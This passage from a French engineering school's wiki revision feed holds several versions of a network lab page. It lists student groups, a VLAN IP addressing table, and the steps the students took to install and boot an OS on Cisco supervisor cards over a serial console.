| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom Vm&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.61&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.62&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.63&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.64&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.65&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.66&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.67&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.68&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.69&lt;br /&gt;
|Alpha_jet&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.70&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.71&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.72&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.73&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problèmatique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existance d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérificaton de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52454</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52454"/>
				<updated>2020-09-25T08:34:56Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Table du vlan2 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP  !! nom Vm&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.61&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.62&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.63&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.64&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.65&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.66&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.67&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.68&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.69&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.70&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.71&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.72&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.73&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problèmatique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existance d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérificaton de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52453</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52453"/>
				<updated>2020-09-25T08:33:47Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : /* Table d'adressage IP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Bienvenue sur l'article wikipédia de la promotion 2020 - 2021 de la section IMA2A5. Cette page traite du sujet de protocole avancé vu en semestre 9.&lt;br /&gt;
Le lien vers le sujet est : [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html]&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| HERBOMEL Guillaume&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| CRAMETTE Samuel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
| AVEZ Thibaut&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G5 | Cahier groupe n°5]]&lt;br /&gt;
| GLAINE Alexandre&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G6 | Cahier groupe n°6]]&lt;br /&gt;
| VITTECOQ Thomas&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G7 | Cahier groupe n°7]]&lt;br /&gt;
| CHENU Léna &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G8 | Cahier groupe n°8]]&lt;br /&gt;
| COULON Nathan&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G9 | Cahier groupe n°9]]&lt;br /&gt;
| DJAMBA Crispin&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Architecture matérielle ==&lt;br /&gt;
[[Fichier:Architecture-MA2a5-2020_2021.JPG]]&lt;br /&gt;
&lt;br /&gt;
== Table d'adressage IP ==&lt;br /&gt;
=== Table du vlan2 ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de l'appareil !! IP&lt;br /&gt;
|-&lt;br /&gt;
|6509&lt;br /&gt;
|193.48.57.61&lt;br /&gt;
|-&lt;br /&gt;
|3560 E&lt;br /&gt;
|193.48.57.62&lt;br /&gt;
|-&lt;br /&gt;
|routeur virtuel&lt;br /&gt;
|193.48.57.63&lt;br /&gt;
|-&lt;br /&gt;
|Lionel&lt;br /&gt;
|193.48.57.64&lt;br /&gt;
|-&lt;br /&gt;
|Guillaume&lt;br /&gt;
|193.48.57.65&lt;br /&gt;
|-&lt;br /&gt;
|Samuel&lt;br /&gt;
|193.48.57.66&lt;br /&gt;
|-&lt;br /&gt;
|Thibaut&lt;br /&gt;
|193.48.57.67&lt;br /&gt;
|-&lt;br /&gt;
|Alexandre&lt;br /&gt;
|193.48.57.68&lt;br /&gt;
|-&lt;br /&gt;
|Thomas&lt;br /&gt;
|193.48.57.69&lt;br /&gt;
|-&lt;br /&gt;
|Crispin&lt;br /&gt;
|193.48.57.70&lt;br /&gt;
|-&lt;br /&gt;
|Léna&lt;br /&gt;
|193.48.57.71&lt;br /&gt;
|-&lt;br /&gt;
|Nathan&lt;br /&gt;
|193.48.57.72&lt;br /&gt;
|-&lt;br /&gt;
|ISR&lt;br /&gt;
|193.48.57.73&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Table générale ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel&lt;br /&gt;
|-&lt;br /&gt;
|Xen&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 1&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 2&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 3&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 4&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 5&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 6&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 7&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 8&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Groupe 9&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|Interconnexion&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|Router1 : X  // Router2 : X // Ecole : X&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== IP des VMs ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
!Nom de la VM !! IP de la VM&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|X&lt;br /&gt;
|X&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Cartes de supervision ===&lt;br /&gt;
&lt;br /&gt;
Problèmatique: Configuration et installation des OS des cartes de supervision&lt;br /&gt;
&lt;br /&gt;
Etape 1: Vérifier l'existance d'OS sur les deux cartes. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes. &lt;br /&gt;
 -&amp;gt; 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)&lt;br /&gt;
 -&amp;gt; 2ème carte: OS absent &lt;br /&gt;
&lt;br /&gt;
Etape 2: Copie du fichier d'OS&lt;br /&gt;
&lt;br /&gt;
[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]&lt;br /&gt;
&lt;br /&gt;
Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la premiere carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxieme carte de supervision.&lt;br /&gt;
&lt;br /&gt;
copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&amp;amp;éé-33.SXI6.bin disk0:&lt;br /&gt;
&lt;br /&gt;
Etape 3: Reboot de la deuxième carte&lt;br /&gt;
&lt;br /&gt;
Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur. &lt;br /&gt;
&lt;br /&gt;
boot&lt;br /&gt;
sh ver &lt;br /&gt;
&lt;br /&gt;
Etape 4: Vérificaton de la redondance&lt;br /&gt;
&lt;br /&gt;
La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active&lt;/div&gt;</summary>
		<author><name>Tvitteco</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52427</id>
		<title>TP sysres IMA2a5 2020/2021</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021&amp;diff=52427"/>
				<updated>2020-09-24T06:43:32Z</updated>
		
		<summary type="html">&lt;p&gt;Tvitteco : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G1 | Cahier groupe n°1]]&lt;br /&gt;
| SAWICZ Lionel&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G2 | Cahier groupe n°2]]&lt;br /&gt;
| NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G3 | Cahier groupe n°3]]&lt;br /&gt;
| NOM Prénom&lt;br /&gt;
|-&lt;br /&gt;
| [[ TP sysres IMA2a5 2020/2021 G4 | Cahier groupe n°4]]&lt;br /&gt;
